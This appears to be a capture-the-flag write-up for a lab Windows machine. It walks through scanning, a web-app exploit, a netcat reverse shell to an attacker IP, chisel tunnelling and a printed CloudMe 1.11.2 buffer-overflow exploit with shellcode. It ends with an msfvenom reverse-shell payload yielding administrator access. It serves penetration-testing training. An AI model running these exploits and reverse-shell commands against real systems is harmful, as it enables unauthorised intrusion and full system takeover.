IP
initial nmap scan
Copy sudo nmap -p- --min-rate 10000 10.10.10.198 | cut -d"/" -f1 | tr '\n' ',' we have the following ports open on the target
8080
Lets try and get more information of the target
Copy sudo nmap -sCV -p8080 10.10.10.198 -oA nmap_results results
Copy Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 06:16 EST
Nmap scan report for 10.10.10.198
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds
Heading over to port 8080 we can see the following
lets get feroxbuster runnnig and see if we can find any hidden web pages
Copy feroxbuster -u http://10.10.10.198:8080 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,js -o dirs.txt
hunting around the website, within the contact.php we do find the application running the web app
we can try to find any vulnerabilities associated with this software, after abit of googling we find
we can utilise the following exploit to gain a shell on the target
Copy python2 exploit.py http://10.10.10.198:8080/ we now have a shell on the target machine
we do have limited functionality within this shell Lerts upload nc.exe and upgrade our shell
Lets start a smb server on our local machine
Copy sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support Lets copy nc.exe over to the target (from our shell)
Copy copy \\10.10.14.3\shrek123\nc.exe
Copy rlwrap -cAr nc -lvnp 9001 Now lets execute nc.exe and gain our shell
Copy .\nc.exe -e cmd.exe 10.10.14.3 9001
we have our shell
when we check netstat we can see two ports listening only within the local host
Next lets grab the process ID of port 8888 (6044) and grep (findstr)
the PID does change every couple of seconds so to find it
Copy netstat -ano | findstr 8888
tasklist /v | findstr 6044 # most recent PID We can see there is a .exe file being executed, Lets see if we can find it
Looking through the user shaun directory we do find it within the downloads directory
What we can do next is see if we can find any vulnerabilities associated with this program
we can see the version number of CloudMe being 1.11.2
Now to exploit this service, we will need to tunnel from our local machine to the target machine , we can use the tool chisel for this
more specifically the .exe executable
We can transfer via our smb server
we will copy the Windows binary to the /programdata directory (where we will be staging in )
Copy copy \\10.10.14.3\shrek123\chisel_1.9.1_windows_amd64 c.exe Now we will run the Linux binary on our local machine in server mode
Copy chmod +x chisel_1.9.1_linux_amd64
sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse Next from our target machine, we will run chisel as the client
Copy .\c.exe client 10.10.14.3:8000 R:8888:localhost:8888 Now if we run netstat on our local machine we should we are listening on port 8888
Copy netstat -ano | grep 8888 Now that we have chisel set up Lets look at this exploit
Copy searchsploit -m windows/remote/48389.py The exploit
Copy # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value) we can see the following
it opens a connection to the target on port 8888
pretty simple right
we can utilize msfvenom to generate our own payload that will return a stageless (can catch with nc) reverse tcp shell
Copy msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9010 -b '\x00\x0A\x0D' -f python -v payload Now we can change the payload within the existing exploit with our newly created payload we created with msfvenom
Now we can start our nc listener
and we can run the exploit
we now have a shell as administrator on the target machine
